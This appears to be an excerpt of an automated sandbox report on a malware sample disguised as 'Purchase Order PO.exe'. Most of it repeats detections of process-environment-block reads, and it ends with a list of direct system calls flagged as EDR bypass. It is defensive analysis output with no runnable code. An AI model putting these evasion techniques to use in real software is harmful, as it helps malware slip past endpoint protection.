                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88770 mov eax, dword ptr fs:[00000030h]3_2_00F88770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90770 mov eax, dword ptr fs:[00000030h]3_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80750 mov eax, dword ptr fs:[00000030h]3_2_00F80750
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2750 mov eax, dword ptr fs:[00000030h]3_2_00FC2750
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2750 mov eax, dword ptr fs:[00000030h]3_2_00FC2750
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB674D mov esi, dword ptr fs:[00000030h]3_2_00FB674D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB674D mov eax, dword ptr fs:[00000030h]3_2_00FB674D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB674D mov eax, dword ptr fs:[00000030h]3_2_00FB674D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB273C mov eax, dword ptr fs:[00000030h]3_2_00FB273C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB273C mov ecx, dword ptr fs:[00000030h]3_2_00FB273C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB273C mov eax, dword ptr fs:[00000030h]3_2_00FB273C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFC730 mov eax, dword ptr fs:[00000030h]3_2_00FFC730
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC720 mov eax, dword ptr fs:[00000030h]3_2_00FBC720
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC720 mov eax, dword ptr fs:[00000030h]3_2_00FBC720
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80710 mov eax, dword ptr fs:[00000030h]3_2_00F80710
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB0710 mov eax, dword ptr fs:[00000030h]3_2_00FB0710
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010006F1 mov eax, dword ptr fs:[00000030h]3_2_010006F1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010006F1 mov eax, dword ptr fs:[00000030h]3_2_010006F1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC700 mov eax, dword ptr fs:[00000030h]3_2_00FBC700
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC8F9 mov eax, dword ptr fs:[00000030h]3_2_00FBC8F9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC8F9 mov eax, dword ptr fs:[00000030h]3_2_00FBC8F9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100C912 mov eax, dword ptr fs:[00000030h]3_2_0100C912
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100892A mov eax, dword ptr fs:[00000030h]3_2_0100892A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0101892B mov eax, dword ptr fs:[00000030h]3_2_0101892B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE8C0 mov eax, dword ptr fs:[00000030h]3_2_00FAE8C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01000946 mov eax, dword ptr fs:[00000030h]3_2_01000946
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01024978 mov eax, dword ptr fs:[00000030h]3_2_01024978
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01024978 mov eax, dword ptr fs:[00000030h]3_2_01024978
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100C97C mov eax, dword ptr fs:[00000030h]3_2_0100C97C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80887 mov eax, dword ptr fs:[00000030h]3_2_00F80887
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84859 mov eax, dword ptr fs:[00000030h]3_2_00F84859
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84859 mov eax, dword ptr fs:[00000030h]3_2_00F84859
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB0854 mov eax, dword ptr fs:[00000030h]3_2_00FB0854
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010089B3 mov esi, dword ptr fs:[00000030h]3_2_010089B3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010089B3 mov eax, dword ptr fs:[00000030h]3_2_010089B3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010089B3 mov eax, dword ptr fs:[00000030h]3_2_010089B3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F92840 mov ecx, dword ptr fs:[00000030h]3_2_00F92840
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010169C0 mov eax, dword ptr fs:[00000030h]3_2_010169C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA830 mov eax, dword ptr fs:[00000030h]3_2_00FBA830
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov eax, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov eax, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov eax, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov ecx, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov eax, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2835 mov eax, dword ptr fs:[00000030h]3_2_00FA2835
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104A9D3 mov eax, dword ptr fs:[00000030h]3_2_0104A9D3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100E9E0 mov eax, dword ptr fs:[00000030h]3_2_0100E9E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB29F9 mov eax, dword ptr fs:[00000030h]3_2_00FB29F9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB29F9 mov eax, dword ptr fs:[00000030h]3_2_00FB29F9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100C810 mov eax, dword ptr fs:[00000030h]3_2_0100C810
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F8A9D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB49D0 mov eax, dword ptr fs:[00000030h]3_2_00FB49D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102483A mov eax, dword ptr fs:[00000030h]3_2_0102483A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102483A mov eax, dword ptr fs:[00000030h]3_2_0102483A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F809AD mov eax, dword ptr fs:[00000030h]3_2_00F809AD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F809AD mov eax, dword ptr fs:[00000030h]3_2_00F809AD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A0 mov eax, dword ptr fs:[00000030h]3_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016870 mov eax, dword ptr fs:[00000030h]3_2_01016870
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016870 mov eax, dword ptr fs:[00000030h]3_2_01016870
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100E872 mov eax, dword ptr fs:[00000030h]3_2_0100E872
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100E872 mov eax, dword ptr fs:[00000030h]3_2_0100E872
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC096E mov eax, dword ptr fs:[00000030h]3_2_00FC096E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC096E mov edx, dword ptr fs:[00000030h]3_2_00FC096E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC096E mov eax, dword ptr fs:[00000030h]3_2_00FC096E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA6962 mov eax, dword ptr fs:[00000030h]3_2_00FA6962
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA6962 mov eax, dword ptr fs:[00000030h]3_2_00FA6962
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA6962 mov eax, dword ptr fs:[00000030h]3_2_00FA6962
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100C89D mov eax, dword ptr fs:[00000030h]3_2_0100C89D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104A8E4 mov eax, dword ptr fs:[00000030h]3_2_0104A8E4
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F78918 mov eax, dword ptr fs:[00000030h]3_2_00F78918
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F78918 mov eax, dword ptr fs:[00000030h]3_2_00F78918
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE908 mov eax, dword ptr fs:[00000030h]3_2_00FFE908
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE908 mov eax, dword ptr fs:[00000030h]3_2_00FFE908
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBAAEE mov eax, dword ptr fs:[00000030h]3_2_00FBAAEE
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBAAEE mov eax, dword ptr fs:[00000030h]3_2_00FBAAEE
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80AD0 mov eax, dword ptr fs:[00000030h]3_2_00F80AD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB4AD0 mov eax, dword ptr fs:[00000030h]3_2_00FB4AD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB4AD0 mov eax, dword ptr fs:[00000030h]3_2_00FB4AD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01048B28 mov eax, dword ptr fs:[00000030h]3_2_01048B28
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01048B28 mov eax, dword ptr fs:[00000030h]3_2_01048B28
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD6ACC mov eax, dword ptr fs:[00000030h]3_2_00FD6ACC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD6ACC mov eax, dword ptr fs:[00000030h]3_2_00FD6ACC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD6ACC mov eax, dword ptr fs:[00000030h]3_2_00FD6ACC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01028B42 mov eax, dword ptr fs:[00000030h]3_2_01028B42
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016B40 mov eax, dword ptr fs:[00000030h]3_2_01016B40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016B40 mov eax, dword ptr fs:[00000030h]3_2_01016B40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104AB40 mov eax, dword ptr fs:[00000030h]3_2_0104AB40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01034B4B mov eax, dword ptr fs:[00000030h]3_2_01034B4B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01034B4B mov eax, dword ptr fs:[00000030h]3_2_01034B4B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102EB50 mov eax, dword ptr fs:[00000030h]3_2_0102EB50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88AA0 mov eax, dword ptr fs:[00000030h]3_2_00F88AA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88AA0 mov eax, dword ptr fs:[00000030h]3_2_00F88AA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD6AA4 mov eax, dword ptr fs:[00000030h]3_2_00FD6AA4
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB8A90 mov edx, dword ptr fs:[00000030h]3_2_00FB8A90
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA80 mov eax, dword ptr fs:[00000030h]3_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFCA72 mov eax, dword ptr fs:[00000030h]3_2_00FFCA72
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFCA72 mov eax, dword ptr fs:[00000030h]3_2_00FFCA72
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBCA6F mov eax, dword ptr fs:[00000030h]3_2_00FBCA6F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBCA6F mov eax, dword ptr fs:[00000030h]3_2_00FBCA6F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBCA6F mov eax, dword ptr fs:[00000030h]3_2_00FBCA6F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90A5B mov eax, dword ptr fs:[00000030h]3_2_00F90A5B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90A5B mov eax, dword ptr fs:[00000030h]3_2_00F90A5B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86A50 mov eax, dword ptr fs:[00000030h]3_2_00F86A50
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01034BB0 mov eax, dword ptr fs:[00000030h]3_2_01034BB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01034BB0 mov eax, dword ptr fs:[00000030h]3_2_01034BB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBCA38 mov eax, dword ptr fs:[00000030h]3_2_00FBCA38
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA4A35 mov eax, dword ptr fs:[00000030h]3_2_00FA4A35
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA4A35 mov eax, dword ptr fs:[00000030h]3_2_00FA4A35
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102EBD0 mov eax, dword ptr fs:[00000030h]3_2_0102EBD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAEA2E mov eax, dword ptr fs:[00000030h]3_2_00FAEA2E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBCA24 mov eax, dword ptr fs:[00000030h]3_2_00FBCA24
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100CBF0 mov eax, dword ptr fs:[00000030h]3_2_0100CBF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAEBFC mov eax, dword ptr fs:[00000030h]3_2_00FAEBFC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88BF0 mov eax, dword ptr fs:[00000030h]3_2_00F88BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88BF0 mov eax, dword ptr fs:[00000030h]3_2_00F88BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88BF0 mov eax, dword ptr fs:[00000030h]3_2_00F88BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100CA11 mov eax, dword ptr fs:[00000030h]3_2_0100CA11
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA0BCB mov eax, dword ptr fs:[00000030h]3_2_00FA0BCB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA0BCB mov eax, dword ptr fs:[00000030h]3_2_00FA0BCB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA0BCB mov eax, dword ptr fs:[00000030h]3_2_00FA0BCB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80BCD mov eax, dword ptr fs:[00000030h]3_2_00F80BCD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80BCD mov eax, dword ptr fs:[00000030h]3_2_00F80BCD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80BCD mov eax, dword ptr fs:[00000030h]3_2_00F80BCD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90BBE mov eax, dword ptr fs:[00000030h]3_2_00F90BBE
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90BBE mov eax, dword ptr fs:[00000030h]3_2_00F90BBE
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102EA60 mov eax, dword ptr fs:[00000030h]3_2_0102EA60
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054A80 mov eax, dword ptr fs:[00000030h]3_2_01054A80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7CB7E mov eax, dword ptr fs:[00000030h]3_2_00F7CB7E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAEB20 mov eax, dword ptr fs:[00000030h]3_2_00FAEB20
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAEB20 mov eax, dword ptr fs:[00000030h]3_2_00FAEB20
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFEB1D mov eax, dword ptr fs:[00000030h]3_2_00FFEB1D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FB2CF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FB2CF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FB2CF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB2CF0 mov eax, dword ptr fs:[00000030h]3_2_00FB2CF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01038D10 mov eax, dword ptr fs:[00000030h]3_2_01038D10
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01038D10 mov eax, dword ptr fs:[00000030h]3_2_01038D10
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01008D20 mov eax, dword ptr fs:[00000030h]3_2_01008D20
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
